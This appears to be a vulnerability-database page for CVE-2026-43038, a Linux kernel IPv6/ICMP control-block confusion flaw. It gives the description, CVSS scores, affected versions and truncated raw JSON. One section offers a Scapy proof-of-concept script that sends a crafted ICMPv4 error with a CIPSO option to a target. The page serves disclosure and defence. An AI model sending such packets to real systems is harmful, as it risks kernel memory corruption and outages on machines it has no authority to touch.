Security Vulnerability Report
中文
CVE-2026-43038 CVSS 9.8 CRITICAL

CVE-2026-43038

Published: 2026-05-01 15:16:49
Last Modified: 2026-05-08 18:47:20
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: ipv6: icmp: clear skb2->cb[] in ip6_err_gen_icmpv6_unreach() Sashiko AI-review observed: In ip6_err_gen_icmpv6_unreach(), the skb is an outer IPv4 ICMP error packet where its cb contains an IPv4 inet_skb_parm. When skb is cloned into skb2 and passed to icmp6_send(), it uses IP6CB(skb2). IP6CB interprets the IPv4 inet_skb_parm as an inet6_skb_parm. The cipso offset in inet_skb_parm.opt directly overlaps with dsthao in inet6_skb_parm at offset 18. If an attacker sends a forged ICMPv4 error with a CIPSO IP option, dsthao would be a non-zero offset. Inside icmp6_send(), mip6_addr_swap() is called and uses ipv6_find_tlv(skb, opt->dsthao, IPV6_TLV_HAO). This would scan the inner, attacker-controlled IPv6 packet starting at that offset, potentially returning a fake TLV without checking if the remaining packet length can hold the full 18-byte struct ipv6_destopt_hao. Could mip6_addr_swap() then perform a 16-byte swap that extends past the end of the packet data into skb_shared_info? Should the cb array also be cleared in ip6_err_gen_icmpv6_unreach() and ip6ip6_err() to prevent this? This patch implements the first suggestion. I am not sure if ip6ip6_err() needs to be changed. A separate patch would be better anyway.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (Versions prior to commit 0452b6526b2f54b2413b9cb4ff1ea2ac542c99c7)
Linux Kernel (Versions prior to commit 1ceeebd5bd6d855b17a5df625109bfe29129d7cf)
Linux Kernel (Versions prior to commit 3d5127d998de617b130aae96b138dba22ac6a8a7)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
from scapy.all import * # Proof of Concept for CVE-2026-43038 # This script attempts to trigger the vulnerability by sending # a crafted ICMPv4 error packet containing a CIPSO option. # Target IP address target_ip = "192.168.1.100" # Construct the inner IPv6 packet (controlled by attacker) inner_ipv6 = IPv6(src="2001:db8::dead", dst="2001:db8::beef") inner_payload = ICMPv6EchoRequest() # Construct the outer IPv4 ICMP Unreachable packet # We include a CIPSO option to manipulate the control block (cb) # The specific byte alignment is required to overwrite dsthao offset ip_header = IP(dst=target_ip, options=[IPOption_CIPSO(b'\x00\x00\x00\x00')]) icmp_header = ICMP(type=3, code=0) # Dest Unreachable # Send the packet # Note: This requires the target to be vulnerable and process ICMP errors packet = ip_header / icmp_header / inner_ipv6 / inner_payload send(packet) print("[+] Malicious ICMPv4 packet sent to trigger skb->cb confusion.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43038", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:48.533", "lastModified": "2026-05-08T18:47:20.317", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: icmp: clear skb2->cb[] in ip6_err_gen_icmpv6_unreach()\n\nSashiko AI-review observed:\n\n In ip6_err_gen_icmpv6_unreach(), the skb is an outer IPv4 ICMP error packet\n where its cb contains an IPv4 inet_skb_parm. When skb is cloned into skb2\n and passed to icmp6_send(), it uses IP6CB(skb2).\n\n IP6CB interprets the IPv4 inet_skb_parm as an inet6_skb_parm. The cipso\n offset in inet_skb_parm.opt directly overlaps with dsthao in inet6_skb_parm\n at offset 18.\n\n If an attacker sends a forged ICMPv4 error with a CIPSO IP option, dsthao\n would be a non-zero offset. Inside icmp6_send(), mip6_addr_swap() is called\n and uses ipv6_find_tlv(skb, opt->dsthao, IPV6_TLV_HAO).\n\n This would scan the inner, attacker-controlled IPv6 packet starting at that\n offset, potentially returning a fake TLV without checking if the remaining\n packet length can hold the full 18-byte struct ipv6_destopt_hao.\n\n Could mip6_addr_swap() then perform a 16-byte swap that extends past the end\n of the packet data into skb_shared_info?\n\n Should the cb array also be cleared in ip6_err_gen_icmpv6_unreach() and\n ip6ip6_err() to prevent this?\n\nThis patch implements the first suggestion.\n\nI am not sure if ip6ip6_err() needs to be changed.\nA separate patch would be better anyway."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartExcluding": "3.13", "versionEndExcluding": "5.10.253", "matchCriteriaId": "8D3EF93D-D199-4C6C-89F8-AA7C61FD525D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.203", "matchCriteriaId": "20DDB3E9-AABF-4107-ADB0-5362AA067045"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.168", "matchCriteriaId": "E2DDDCA1-6DAB-4018-B920-8F045DDD8D3B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.134", "matchCriteriaId": "F56F925B-BAF8-4F4B-B62F-1496AF19A307"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:-:*:*:*:*:*:*", "matchCriteriaId": "0F72A71E-B6B2-40F2-A21D-BF7CE1514976"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc3:*:*:*:*:*:*", "matchCriteriaId": "A5F72FE2-8F1D-4C65-889F-38FAB8A28B6D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc4:*:*:*:*:*:*", "matchCriteriaId": "C54506BE-8F4B-4411-AEEE-B2C25674B59B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc5:*:*:*:*:*:*", "matchCriteriaId": "A4739BC5-112B-4DDA-8921-16A6BFE6AAA7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc6:*:*:*:*:*:*", "matchCriteriaId": "5782C96D-D8F7-42C1-A3A0-34B1DEF1FC93"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc7:*:*:*:*:*:*", "matchCriteriaId": "51B2DAD1-BF87-4AEF-A41D-81B7D042B22A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.13:rc8:*:*:*:*:*:*", "matchCriteriaId": "C8E94C86-A5D8-4C34-8494-5B471DAEB27A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "crite ... (truncated)